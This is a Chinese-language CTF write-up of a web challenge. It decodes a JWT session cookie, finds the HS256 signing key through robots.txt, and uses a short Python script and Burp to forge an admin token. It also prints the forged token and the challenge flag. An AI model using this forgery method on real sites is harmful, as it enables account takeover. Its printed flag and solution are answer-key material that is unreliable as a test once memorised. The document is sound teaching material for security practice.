根据题目,进行用户注册:
登录注册账号1111,密码1111,进行抓包
我们可以发现,session_id符合JWT模式,断定非upload上传漏洞,根据 session_id=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiMTExMSJ9.11KovmFggafMdmrs-Nre6A7kCc0SZZTw-srfpFBTMd4,我们可以将这分成三个部分,headers,payload,signature:
headers:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9
headers使用64base解码后为:{"typ":"JWT","alg":"HS256"}
payload:eyJ1c2VyIjoiMTExMSJ9
payload使用64base解码后为:{"user":"1111"}
signature:11KovmFggafMdmrs-Nre6A7kCc0SZZTw-srfpFBTMd4,第三段signature(签证)部分,看大佬的文章Python - 解析jwt - 码农教程发现应该这个现在得到的第三段,应该是作者把前两段的base密文通过.拼接起来,然后对其进行HS256加密。
HMACSHA256(参数1+"."+参数2,参数3),如下图:
HMACSHA256(
base64UrlEncode(header) + "." +
base64UrlEncode(payload),
your key
)
再然后对hs256密文进行base64url加密,最终得到token的第三段。
我们现在需要以admin的身份登录进去,把{"user":"1111"}改为{"user":"admin"},但是我们还不知道第三段signature(签证)部分的参数3,就是your key,所以需要去网站目录下进行扫描,看看有没有相关信息。
按照常规的网站目录,后面拼接robots.txt,发现secretkey路径
现在所有的参数都已经找齐,我们需要组成admin的session_id,运行以下py
import jwt
import datetime
from jwt import exceptions
SALT = 'you-will-never-guess'
def create_token():
headers = {"typ":"JWT","alg":"HS256"}
payload = {"user": "admin"}
result = jwt.encode(payload=payload,key=SALT,algorithm='HS256',headers=headers)
return result
if __name__ == '__main__':
token = create_token()
print(token)
得到新的session_id:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.g_lGU4qTO2VhNrZK9k460xz828GcqKBayZPcmLmhUqE
然后进行bp抓包,修改session_id,进行发送
我们可以看到,网页跳转至admin登录界面:
这时候需要右键,选择flag.png。复制图像地址,将图片进行下载,使用二进制打开文件,进行打开flag.png,即可得到flag:
flag{21f9295a-f31a-4cc5-9744-71243c53fbbd}